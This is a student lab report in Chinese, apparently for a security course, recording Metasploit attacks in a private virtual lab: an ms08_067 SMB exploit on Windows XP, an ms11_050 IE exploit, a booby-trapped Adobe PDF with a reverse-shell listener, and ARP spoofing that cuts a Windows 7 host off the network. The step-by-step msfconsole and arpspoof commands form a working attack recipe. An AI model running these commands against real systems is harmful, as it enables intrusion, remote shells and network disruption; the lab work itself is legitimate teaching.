zoukankan      html  css  js  c++  java
  • 20165229 Exp5 MSF基础应用

    20165229 Exp5 MSF基础应用

    一、基础问题回答

    解释exploit,payload,encode是什么:

    • exploit:就是一个简单的攻击指令,在配置完成之后下发攻击命令。
    • payload:是攻击载荷,是我们在攻击过程中真正用到的部分,进行攻击的实体。
    • encode:是重新进行编码,伪装此次攻击,躲过查杀。

    二、漏洞选择

    1.主动攻击实践--ms08_067+generic/shell_reverse_tcp(成功!)

    2.一个针对浏览器的攻击--ms11_050+windows/browser/ms11_050_mshtml_cobjectelement(成功!)

    3.一个针对客户端的攻击-Adobe+generic/shell_reverse_tcp(成功!)

    4.成功应用任何一个辅助模块--spoof arp+spoof/arp/arp_poisoning(成功&唯一!)

    三、实验过程记录

    (一)主动攻击实践--ms08_067

    攻击机kali:192.168.43.234

    靶机winXP:192.168.43.111

    payload:generic/shell_reverse_tcp

    • 实验前检查两个虚拟机能否互ping通

    • 在Kali中打开mfs,输入指令msfconsole进入控制台

    • 输入use exploit/windows/smb/ms08_067_netapi指令进行主动攻击

    • show payloads显示可用载荷

    • set payload generic/shell_reverse_tcp选择载荷

    • show options显示配置信息

    • set RHOSTS 192.168.43.111设置靶机xp IP

    • set LHOST 192.168.43.234设置攻击机kali IP

    • exploit开始攻击

    (二)一个针对浏览器的攻击--ms11_050

    攻击机kali:192.168.43.234

    靶机win7:192.168.43.76

    payload:windows/browser/ms11_050_mshtml_cobjectelement

    • 实验前检查两个虚拟机能否互ping通

    • 在Kali中打开mfs,输入指令msfconsole进入控制台

    • 输入search ms11_050查找漏洞

    • 输入use exploit/windows/browser/ms11_050_mshtml_cobjectelement选择漏洞

    • show payloads显示可用载荷

    • set payload windows/meterpreter/reverse_tcp选择载荷

    • show payloads

    • set LHOST 192.168.43.234设置攻击机kali IP

    • set RHOST 192.168.43.76设置靶机win7 IP

    • exploit开始攻击

    • win7下打开IE浏览器,输入上图网址http://192.168.43.234:8080/F9nYjt,如下图所示攻击成功,kali同时自动回连

    (三)一个针对客户端的攻击-Adobe

    攻击机kali:192.168.43.234

    靶机win7:192.168.43.76

    payload:generic/shell_reverse_tcp

    • 在Kali中打开mfs,输入指令msfconsole进入控制台

    • search adobe查找漏洞

    • 输入use windows/fileformat/adobe_cooltype_sing选择漏洞

    • show payloads显示可用载荷

    • set payload generic/shell_reverse_tcp选择载荷

    • set LHOST 192.168.43.234设置攻击机kali IP

    • set FILENAME 5229msf.pdf设置生成的pdf文件名

    • exploit开始攻击

    • 把上图所示的文件夹中的5229msf.pdf文件复制到u盘里,再拖到win7中

    cp /root/.msf4/local/5229msf.pdf zkj420

    • 回到kali,back退出当前模块,use exploit/multi/handler进入监听模块,set payload windows/meterpreter/reverse_tcp

    set LHOST 192.168.43.234设置kali IP

    exploit开始监听

    • win7中用Adobe9.0打开pdf文件,kali回连成功

    (四)成功应用任何一个辅助模块--spoof arp

    攻击机kali:192.168.43.234

    靶机win7:192.168.43.76

    漏洞:spoof/arp/arp_poisoning

    • 在Kali中打开mfs,输入指令msfconsole进入控制台

    • 输入show auxiliary,选择spoof/arp/arp_poisoning漏洞

    • 新开一个终端,fping -g 192.168.43.234/24查看哪些主机也在局域网中

    • 输入arpspoof -h查看命令使用方法

    • 输入arpspoof -i eth0 -t 192.168.43.76(win7 IP) 192.168.43.1(在此局域网中的另一主机IP)进行ARP攻击

    • win7中浏览器无法访问任何网页,攻击成功

    • 回到kali,按command+C停止攻击,win7 IE浏览器可以正常访问网页

  • 相关阅读:
    质量属性--信息技术手册
    蓝桥杯赛前整理
    感悟:荔枝架构实践与演进历程
    以《淘宝网》为例,描绘质量属性的六个常见属性场景
    感悟:淘宝架构演进背后——零售业务中台架构设计探讨及实践
    为什么要考研???
    寒假学习笔记03
    寒假学习笔记02
    寒假学习笔记01
    数据清洗与数据处理
  • 原文地址:https://www.cnblogs.com/zkkj/p/10742758.html
Copyright © 2011-2022 走看看